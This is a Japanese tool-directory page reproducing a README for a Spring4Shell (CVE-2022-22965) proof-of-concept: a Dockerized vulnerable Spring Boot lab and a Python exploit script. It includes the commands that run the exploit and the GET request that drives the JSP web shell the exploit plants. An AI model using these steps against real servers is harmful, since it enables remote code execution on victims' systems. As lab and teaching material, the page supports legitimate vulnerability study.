Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-22965 — CVE-2022-22965 (Spring4Shell) の概念実証エクスプロイト。脆弱な Spring Boot アプリケーション、Python エクスプロイトスクリプト、およびテスト用の Docker ベースのラボ環境が含まれています。 | Kitploit
ツール/GitHubGitHub/mariomamo/cve-2022-22965
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubmariomamo/cve-2022-22965

CVE-2022-22965

CVE-2022-22965 (Spring4Shell) の概念実証エクスプロイト。脆弱な Spring Boot アプリケーション、Python エクスプロイトスクリプト、およびテスト用の Docker ベースのラボ環境が含まれています。

リポジトリを見る
514年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

👾 CVE-2022-22965

これは、CVE-2022-22965 (spring4shell) 脆弱性のエクスプロイトの概念実証です。 以下で構成されています:

  • 脆弱なSpringbootアプリケーション;
  • Pythonで書かれたエクスプロイトスクリプト;
  • エクスプロイトが機能しないことをテストするための安全なアプリ;
  • 脆弱なアプリケーションを実行し、エクスプロイトをテストするためのDockerfile;

🔧コラボレーター

  • [🇮🇹] Mario Offertucci;
  • [🇮🇹] Antonio Donnarumma.

⚙️ 前提条件

  • Docker: Springbootアプリケーションを搭載したTomcatコンテナを実行するために使用されます;
  • Python: エクスプロイトを実行するために使用されます;

1️⃣ Springbootアプリケーションの実行

プロジェクトのルートフォルダ内に、Tomcatイメージを作成し、vulnerable_app/target/spring4shell.war と safe_app/target/safeapp.war ファイルを /usr/local/tomcat/webapps フォルダにコピーするDockerfileがあります。そのため、イメージをビルドしてコンテナを起動するだけです。

Tomcatイメージのビルド

root@kitploit:~
docker build -t cve_2022_22965 .

コンテナの起動

root@kitploit:~
docker run -p 8080:8080 -d --name springshell cve_2022_22965

アプリケーションが応答しているか確認

root@kitploit:~
curl --location --request POST http://localhost:8080/spring4shell/vulnerability/exploit?name=Elliot%20Alderson

次のような応答が見られた場合

root@kitploit:~
This is Elliot Alderson

アプリケーションは正常に動作しています。

2️⃣ エクスプロイトを実行

root@kitploit:~
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit

挿入するJSPファイル名をオプションで指定できますが、必須ではありません。 例

root@kitploit:~
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit -f exploit.jsp

名前を指定しない場合、ランダムな名前が生成されます。

コマンドシェルに次のように表示されます
エクスプロイト後、HTTP GETリクエストでもコマンドを送信できます

root@kitploit:~
http://localhost:8080/exploit.jsp?pwd=pass&cmd=ls

被害マシンでシェルを開くことに成功しました!お楽しみください。

ツールをダウンロード